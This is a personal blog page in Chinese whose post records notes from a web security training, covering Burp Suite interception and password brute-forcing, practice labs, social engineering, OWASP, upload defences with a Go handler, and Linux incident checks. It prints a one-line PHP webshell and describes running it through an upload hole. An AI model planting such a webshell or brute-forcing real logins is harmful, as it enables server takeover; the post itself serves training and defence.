-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
782 lines (556 loc) · 105 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
<link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
<link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
<link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
<link rel="mask-icon" href="/images/logo.svg" color="#222">
<link rel="stylesheet" href="/css/main.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/[email protected]/css/all.min.css">
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/animate.min.css">
<script class="hexo-configurations">
var NexT = window.NexT || {};
var CONFIG = {"hostname":"zhuang-weiming.github.io","root":"/","images":"/images","scheme":"Muse","version":"8.3.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
</script>
<meta property="og:type" content="website">
<meta property="og:title" content="Zhuang's Diary">
<meta property="og:url" content="https://zhuang-weiming.github.io/index.html">
<meta property="og:site_name" content="Zhuang's Diary">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="Weiming Zhuang">
<meta name="twitter:card" content="summary">
<link rel="canonical" href="https://zhuang-weiming.github.io/">
<script class="page-configurations">
// https://hexo.io/docs/variables.html
CONFIG.page = {
sidebar: "",
isHome : true,
isPost : false,
lang : 'en'
};
</script>
<title>Zhuang's Diary</title>
<noscript>
<style>
body { margin-top: 2rem; }
.use-motion .menu-item,
.use-motion .sidebar,
.use-motion .post-block,
.use-motion .pagination,
.use-motion .comments,
.use-motion .post-header,
.use-motion .post-body,
.use-motion .collection-header {
visibility: visible;
}
.use-motion .header,
.use-motion .site-brand-container .toggle,
.use-motion .footer { opacity: initial; }
.use-motion .site-title,
.use-motion .site-subtitle,
.use-motion .custom-logo-image {
opacity: initial;
top: initial;
}
.use-motion .logo-line {
transform: scaleX(1);
}
.search-pop-overlay, .sidebar-nav { display: none; }
.sidebar-panel { display: block; }
</style>
</noscript>
</head>
<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
<div class="headband"></div>
<main class="main">
<header class="header" itemscope itemtype="http://schema.org/WPHeader">
<div class="header-inner"><div class="site-brand-container">
<div class="site-nav-toggle">
<div class="toggle" aria-label="Toggle navigation bar" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
</div>
<div class="site-meta">
<a href="/" class="brand" rel="start">
<i class="logo-line"></i>
<h1 class="site-title">Zhuang's Diary</h1>
<i class="logo-line"></i>
</a>
<p class="site-subtitle" itemprop="description">言之有物,持之以恒</p>
</div>
<div class="site-nav-right">
<div class="toggle popup-trigger">
<i class="fa fa-search fa-fw fa-lg"></i>
</div>
</div>
</div>
<nav class="site-nav">
<ul class="main-menu menu">
<li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li>
<li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li>
<li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
<li class="menu-item menu-item-search">
<a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
</a>
</li>
</ul>
</nav>
<div class="search-pop-overlay">
<div class="popup search-popup"><div class="search-header">
<span class="search-icon">
<i class="fa fa-search"></i>
</span>
<div class="search-input-container">
<input autocomplete="off" autocapitalize="off" maxlength="80"
placeholder="Searching..." spellcheck="false"
type="search" class="search-input">
</div>
<span class="popup-btn-close" role="button">
<i class="fa fa-times-circle"></i>
</span>
</div>
<div class="search-result-container no-result">
<div class="search-result-icon">
<i class="fa fa-spinner fa-pulse fa-5x"></i>
</div>
</div>
</div>
</div>
</div>
<div class="toggle sidebar-toggle" role="button">
<span class="toggle-line"></span>
<span class="toggle-line"></span>
<span class="toggle-line"></span>
</div>
<aside class="sidebar">
<div class="sidebar-inner sidebar-overview-active">
<ul class="sidebar-nav">
<li class="sidebar-nav-toc">
Table of Contents
</li>
<li class="sidebar-nav-overview">
Overview
</li>
</ul>
<div class="sidebar-panel-container">
<!--noindex-->
<div class="post-toc-wrap sidebar-panel">
</div>
<!--/noindex-->
<div class="site-overview-wrap sidebar-panel">
<div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
<p class="site-author-name" itemprop="name">Weiming Zhuang</p>
<div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
<nav class="site-state">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">261</span>
<span class="site-state-item-name">posts</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/">
<span class="site-state-item-count">65</span>
<span class="site-state-item-name">tags</span></a>
</div>
</nav>
</div>
<div class="links-of-author site-overview-item animated">
<span class="links-of-author-item">
<a href="https://www.linkedin.com/in/zhuangweiming/" title="Linkedin → https://www.linkedin.com/in/zhuangweiming/" rel="noopener" target="_blank"><i class="fab fa-linkedin fa-fw"></i>Linkedin</a>
</span>
</div>
</div>
</div>
<div class="back-to-top animated" role="button" aria-label="Back to top">
<i class="fa fa-arrow-up"></i>
<span>0%</span>
</div>
</div>
</aside>
<div class="sidebar-dimmer"></div>
</header>
<div class="reading-progress-bar"></div>
<noscript>
<div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>
<div class="main-inner index posts-expand">
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
<link itemprop="mainEntityOfPage" href="https://zhuang-weiming.github.io/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/">
<span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
<meta itemprop="image" content="/images/avatar.gif">
<meta itemprop="name" content="Weiming Zhuang">
<meta itemprop="description" content="">
</span>
<span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Zhuang's Diary">
</span>
<header class="post-header">
<h2 class="post-title" itemprop="name headline">
<a href="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/" class="post-title-link" itemprop="url">Web安全培训</a>
</h2>
<div class="post-meta-container">
<div class="post-meta">
<span class="post-meta-item">
<span class="post-meta-item-icon">
<i class="far fa-calendar"></i>
</span>
<span class="post-meta-item-text">Posted on</span>
<time title="Created: 2024-12-10 17:00:00 / Modified: 17:33:27" itemprop="dateCreated datePublished" datetime="2024-12-10T17:00:00+08:00">2024-12-10</time>
</span>
</div>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<h2 id="工具介绍"><a href="#工具介绍" class="headerlink" title="工具介绍"></a>工具介绍</h2><p>Burp 抓包,改包工具, 基于java,运行,需要JRE<br>需要搭梯子才能登录其网站主页,美国公司,商业软件,年费399年费,有社区开源版本<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/1.png"><br>Burp未启动时,网络的路由环境<br> 本地(浏览器) — 服务器<br>Burp启动后,网络的路由环境<br> 本地(浏览器 — Burp) — 服务器<br>Burp extensions — <a target="_blank" rel="noopener" href="https://github.com/snoopysecurity/awesome-burp-extensions">https://github.com/snoopysecurity/awesome-burp-extensions</a></p>
<p>DVWA靶场,里面是各种漏洞攻击的介绍和说明,是一个入门的联系资源,英文资源。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/2.png"></p>
<p>Pikachu 漏洞练习平台,同理,中文资源。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/3.png"></p>
<p><a target="_blank" rel="noopener" href="https://www.kali.org/">https://www.kali.org/</a> , 一个Linux发行版本,是专门针对各种信息安全任务或者练习而准备的。</p>
<h2 id="前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击"><a href="#前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击" class="headerlink" title="前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击"></a>前端一切不可靠,如上Burp在客户端做网络流量拦截,做中间人攻击</h2><p>对应的措施:<br>1.后端校验;2.前端不做逻辑判断;3.前端加密混淆;4.移动端加壳;5.反调试检测,防止逆向工程; 6.后台数据库存储字段最好经过KMS后端密文,常见的服务器本地算法 — hash(明文+盐值)<br>通常,<a target="_blank" rel="noopener" href="http://www.website.com/robots.txt%EF%BC%8C%E5%A6%82">www.website.com/robots.txt,如</a> <a target="_blank" rel="noopener" href="https://www.bilibili.com/robots.txt">https://www.bilibili.com/robots.txt</a> ,很多网站都有这样子一个网站URL的列表,表示本网站允许访问的URL。</p>
<p>Burp 启动浏览器,在网站的<a target="_blank" rel="noopener" href="http://burp/%E5%9C%B0%E5%9D%80%EF%BC%8C">http://burp/地址,</a><br>在网页右上角点击CA Certificate 下载Burp颁发的证书。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/4.png"></p>
<p>Burp暴力破解,尝试用户名和密码时,可以使用“Repeater”和“Intruder”两个菜单的功能。<br>通常登录成功后,response 的长度会有不同。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/5.png"><br>暴力破解的本质是 自动化,大量发送请求,猜测密码。<br>应对方法:<br>1.要求用户密码设置的复杂度;<br>2.识别爬虫/机器人:验证码,滑块,随机验证码;<br>3.限制登录频率:每次登录n秒以上方可,错误m次后冻结该用户x分钟,这样会带来问题:<br>A.前端限制,通过重置本地数据可以绕过;<br>B.IP地址限制,可能会误封正常用户,攻击者租用地址池拥有大量IP。<br>C.账号限制,会造成正常用户无法登录,恶意攻击者可以制造拒绝服务攻击。<br>4.增加密码强度,特别是增加密码长度是最有效的强度。<br>A.密码一户一用,避免一个密码到处使用,避免撞库攻击。<br>密码的本质是进行身份验证的手段。<br>密码的应用场景是基于以下假设:只有用户和服务器知道该密码<br>其他方式验证身份:短信验证码,指纹,面部识别,USBKEY,2FA,多因子验证等等。</p>
<h2 id="社会工程"><a href="#社会工程" class="headerlink" title="社会工程"></a>社会工程</h2><p>黑客通过社会工程学(Social Engineering)实现攻击的手法多种多样,主要是利用人类的心理弱点和信任机制来获取信息或访问权限。<br>钓鱼攻击,尾随攻击,假冒身份,电话攻击,非技术性攻击,社交媒体欺骗,媒体投影攻击,关系建立攻击等等。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/6.png"></p>
<h2 id="OWASP-—-Open-Web-Application-Security-Project"><a href="#OWASP-—-Open-Web-Application-Security-Project" class="headerlink" title="OWASP — Open Web Application Security Project"></a>OWASP — Open Web Application Security Project</h2><p>OWASP Top 10 提供了Web 安全领域发生最频繁的10种事故。最新版本是 2021 年发布的 — <a target="_blank" rel="noopener" href="https://owasp.org/Top10/zh_CN/">https://owasp.org/Top10/zh_CN/</a></p>
<p>WebShell - 以网页形式实现shell的功能,能够对系统进行操作。例如,文件读写,命令执行等。也被称为网页木马。<br>首先,网站如果对用户上传的文件,不做控制,黑客则有可能会上传木马文件,黑客通过木马文件控制后台服务器,如下,<br>通过 <a target="_blank" rel="noopener" href="https://github.com/AntSwordProject/">https://github.com/AntSwordProject/</a> 工具可以执行网页木马。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/7.png"><br>执行木马 <?php eval($_POST['cmd']);?> 成功,成功访问到后端服务器的目录和文件。<br><img src="/2024/12/10/Web%E5%AE%89%E5%85%A8%E5%9F%B9%E8%AE%AD/8.png"></p>
<p>仅仅依赖客户端 JavaScript 验证和服务器端 MIME 类型检查仍然不够安全,因为客户端验证很容易被绕过,而且 MIME 类型本身也可能被伪造,尽管概率较低。 为了构建一个更加严谨的文件上传系统,需要采取更全面的安全措施,将验证和安全检查融入整个上传流程的各个阶段。</p>
<p>一个更严谨的文件上传系统应该包含以下措施:</p>
<ol>
<li>客户端验证 (加强):<br>文件类型检查 (加强): 虽然 file.type 相对可靠,但仍然不是绝对安全的。 可以考虑结合一些额外的检查:<br>文件头部信息检查: 读取文件的前几个字节,检查是否符合已知的文件格式规范。 这需要对不同文件类型的头部结构有深入的了解。 但这仍然只能作为辅助手段,不能完全依赖。<br>更严格的正则表达式: 使用更精确的正则表达式来验证文件名,但这仍然不能防止恶意文件伪装。<br>文件大小限制: 设置一个合理的文件大小限制,并进行客户端验证。<br>用户反馈: 提供清晰的用户反馈,告知用户文件上传失败的原因,例如文件类型不允许、文件大小超过限制等。<br>禁止直接拖拽上传: 避免用户直接拖拽文件到上传区域,强制用户通过“选择文件”按钮选择文件,这样可以更好地控制文件上传过程。</li>
<li>服务器端验证 (多层防御):<br>文件类型检查 (多重验证): 不要仅仅依靠 MIME 类型,结合多种方法进行验证:<br>文件签名: 检查文件的魔术数字 (magic number),这是一种非常可靠的方法。 不同的文件格式通常有独特的魔术数字。<br>文件内容分析: 对于一些关键的文件类型,可以进行更深入的内容分析,检查文件结构是否符合规范。 这需要根据具体的文件类型定制相应的分析方法。 这可能需要耗费较多资源。<br>文件大小限制: 设置严格的文件大小限制,防止资源耗尽攻击(Denial of Service,DoS)。<br>临时文件存储: 将上传的文件先保存到一个临时目录,然后再进行后续处理,这样可以避免恶意文件直接影响服务器。<br>文件扩展名检查 (补充): 虽然不完全可靠,但作为附加的检查,可以辅助判断文件的类型。<br>内容安全扫描 (关键): 使用专业的安全扫描工具,扫描上传的文件是否包含恶意代码、病毒或其他有害内容。 这可能是最关键的安全步骤,但会增加系统复杂性和成本。 一些云服务提供商提供此类服务。<br>白名单机制: 只允许特定类型的文件上传。 尽量避免使用黑名单,因为黑名单很难完全覆盖所有的恶意文件类型。<br>沙盒环境: 在沙盒环境中执行文件分析,以最大程度地限制恶意代码对服务器的影响。<br>日志记录: 记录所有的文件上传事件,包括文件名、MIME 类型、文件大小、上传时间以及验证结果。 这有助于追踪和分析安全事件。</li>
<li>其他安全措施:<br>HTTPS: 使用 HTTPS 加密上传过程,防止数据被窃取。<br>输入验证: 对所有用户输入进行严格的验证,防止注入攻击。<br>代码安全审计: 定期对代码进行安全审计,查找和修复潜在的安全漏洞。<br>服务端代码示例,如下:<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line"> <span class="string">"fmt"</span></span><br><span class="line"> <span class="string">"io"</span></span><br><span class="line"> <span class="string">"mime/multipart"</span></span><br><span class="line"> <span class="string">"net/http"</span></span><br><span class="line"> <span class="string">"os"</span></span><br><span class="line"> <span class="string">"path/filepath"</span></span><br><span class="line"> <span class="string">"regexp"</span></span><br><span class="line"> <span class="string">"strings"</span></span><br><span class="line"></span><br><span class="line"> <span class="string">"github.com/gabriel-vasile/mimetype"</span> <span class="comment">// 用于更准确的 MIME 类型检测</span></span><br><span class="line"> <span class="string">"github.com/google/uuid"</span> <span class="comment">// 用于生成唯一的文件名</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment">// AllowedMimeTypes 定义允许上传的文件类型</span></span><br><span class="line"><span class="keyword">var</span> AllowedMimeTypes = <span class="keyword">map</span>[<span class="keyword">string</span>]<span class="keyword">bool</span>{</span><br><span class="line"> <span class="string">"image/jpeg"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"image/png"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="string">"image/gif"</span>: <span class="literal">true</span>,</span><br><span class="line"> <span class="comment">// 添加其他允许的 MIME 类型</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">// MaxFileSize 定义允许上传的最大文件大小 (字节)</span></span><br><span class="line"><span class="keyword">const</span> MaxFileSize = <span class="number">10</span> * <span class="number">1024</span> * <span class="number">1024</span> <span class="comment">// 10MB</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// uploadHandler 处理文件上传请求</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">uploadHandler</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> {</span><br><span class="line"> <span class="keyword">if</span> r.Method != http.MethodPost {</span><br><span class="line"> http.Error(w, <span class="string">"Method Not Allowed"</span>, http.StatusMethodNotAllowed)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> file, handler, err := r.FormFile(<span class="string">"file"</span>) <span class="comment">// 假设表单字段名为 "file"</span></span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, err.Error(), http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">defer</span> file.Close()</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 客户端验证 (加强)</span></span><br><span class="line"> fileName := handler.Filename</span><br><span class="line"> <span class="keyword">if</span> !isValidFileName(fileName) { <span class="comment">// 检查文件名是否合法</span></span><br><span class="line"> http.Error(w, <span class="string">"Invalid file name"</span>, http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> fileSize := handler.Size</span><br><span class="line"> <span class="keyword">if</span> fileSize > MaxFileSize {</span><br><span class="line"> http.Error(w, <span class="string">"File too large"</span>, http.StatusRequestEntityTooLarge)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 服务器端验证 (多层防御)</span></span><br><span class="line"> detectedMimeType, err := mimetype.DetectReader(file)</span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, <span class="string">"Failed to detect MIME type"</span>, http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> !AllowedMimeTypes[detectedMimeType.String()] {</span><br><span class="line"> http.Error(w, <span class="string">"Invalid file type"</span>, http.StatusBadRequest)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 使用 UUID 生成唯一的文件名,避免文件名冲突</span></span><br><span class="line"> newFileName := uuid.New().String() + filepath.Ext(fileName)</span><br><span class="line"> uploadPath := <span class="string">"./uploads/"</span> + newFileName <span class="comment">// 定义上传文件的存储路径</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建上传目录,如果不存在</span></span><br><span class="line"> os.MkdirAll(<span class="string">"./uploads/"</span>, <span class="number">0755</span>)</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 创建文件并保存</span></span><br><span class="line"> newFile, err := os.Create(uploadPath)</span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, err.Error(), http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">defer</span> newFile.Close()</span><br><span class="line"></span><br><span class="line"> _, err = io.Copy(newFile, file)</span><br><span class="line"> <span class="keyword">if</span> err != <span class="literal">nil</span> {</span><br><span class="line"> http.Error(w, err.Error(), http.StatusInternalServerError)</span><br><span class="line"> <span class="keyword">return</span></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// 此处添加更严格的安全检查,例如:</span></span><br><span class="line"> <span class="comment">// 1. 使用第三方库进行病毒扫描 (ClamAV, VirusTotal API 等)</span></span><br><span class="line"> <span class="comment">// 2. 更深入的文件内容分析,根据文件类型进行特定检查</span></span><br><span class="line"></span><br><span class="line"> fmt.Fprintf(w, <span class="string">"File uploaded successfully: %s\n"</span>, newFileName)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="comment">// isValidFileName 检查文件名是否合法,防止目录遍历攻击等</span></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">isValidFileName</span><span class="params">(fileName <span class="keyword">string</span>)</span> <span class="title">bool</span></span> {</span><br><span class="line"> re := regexp.MustCompile(<span class="string">`^[a-zA-Z0-9._-]+$`</span>) <span class="comment">// 只允许字母、数字、点、下划线和短横线</span></span><br><span class="line"> <span class="keyword">return</span> re.MatchString(fileName)</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> {</span><br><span class="line"> http.HandleFunc(<span class="string">"/upload"</span>, uploadHandler)</span><br><span class="line"> fmt.Println(<span class="string">"Server listening on port 8080"</span>)</span><br><span class="line"> http.ListenAndServe(<span class="string">":8080"</span>, <span class="literal">nil</span>)</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
AllowedMimeTypes: 定义了允许上传的文件类型,使用 map[string]bool 更易于管理。<br>MaxFileSize: 设置了最大文件大小限制。<br>mimetype 库: 使用了 github.com/gabriel-vasile/mimetype 库来更准确地检测 MIME 类型。 这比只依赖 handler.Header.Get(“Content-Type”) 更可靠。<br>UUID 生成文件名: 使用 UUID 生成唯一的文件名,避免文件名冲突和潜在的安全问题。<br>isValidFileName 函数: 对文件名进行简单的验证,防止目录遍历等攻击。 这只是一个基本的示例,实际应用中可能需要更复杂的验证规则。<br>临时文件存储 (缺失但建议): 为了更安全,应该先将文件保存到临时目录,验证通过后再移动到最终存储位置。<br>安全扫描 (缺失但必须): 代码中用注释标注了需要添加安全扫描的地方。 你需要集成一个专业的安全扫描库或服务 (例如 ClamAV, VirusTotal API 等) 来扫描上传的文件是否包含恶意代码。 这是至关重要的安全步骤。</li>
</ol>
<h2 id="Linux-系统排查"><a href="#Linux-系统排查" class="headerlink" title="Linux 系统排查"></a>Linux 系统排查</h2><p>1.查看用户行为<br>/etc/passwd,/etc/shadow 中存储了account和密码信息,黑客可能会增加高权限用户在如上两个文件夹中<br>如 macOS 中,<br>➜ ~ sudo dscl . -list /Users | while read user; do sudo dscl . -read /Users/“$user” UserShell | grep -q ‘/bin/bash’ && echo $user; done<br>_mbsetupuser<br>postgres<br>➜ ~ last<br>Zzz ttys000 Tue Dec 10 14:05 still logged in<br>Zzz ttys000 Mon Dec 9 11:29 - 11:29 (00:00)<br>Zzz ttys000 Sat Dec 7 19:35 - 19:35 (00:00)<br>Zzz console Tue Dec 3 14:51 still logged in<br>reboot time Tue Dec 3 14:50<br>还有,如查看用户的密码是否为空,用户执行过的命令,等等。<br>3.查看进程,例如,黑客通过服务器在挖矿等异常。lspf, top等命令。<br>更多可以查看 Linux 应急响应手册 — <a target="_blank" rel="noopener" href="https://github.com/Just-Hack-For-Fun/Linux-INCIDENT-RESPONSE-COOKBOOK">https://github.com/Just-Hack-For-Fun/Linux-INCIDENT-RESPONSE-COOKBOOK</a></p>
<h2 id="威胁情报中心:"><a href="#威胁情报中心:" class="headerlink" title="威胁情报中心:"></a>威胁情报中心:</h2><p>Windows 系统工具 - <a target="_blank" rel="noopener" href="https://learn.microsoft.com/en-us/sysinternals/">https://learn.microsoft.com/en-us/sysinternals/</a><br>腾讯威胁情报中心 - <a target="_blank" rel="noopener" href="https://tix.qq.com/">https://tix.qq.com/</a><br>可疑文件分析 - <a target="_blank" rel="noopener" href="https://www.virustotal.com/gui/home/upload">https://www.virustotal.com/gui/home/upload</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>
</div>
<div class="post-block">
<article itemscope itemtype="http://schema.org/Article" class="post-content" lang="">
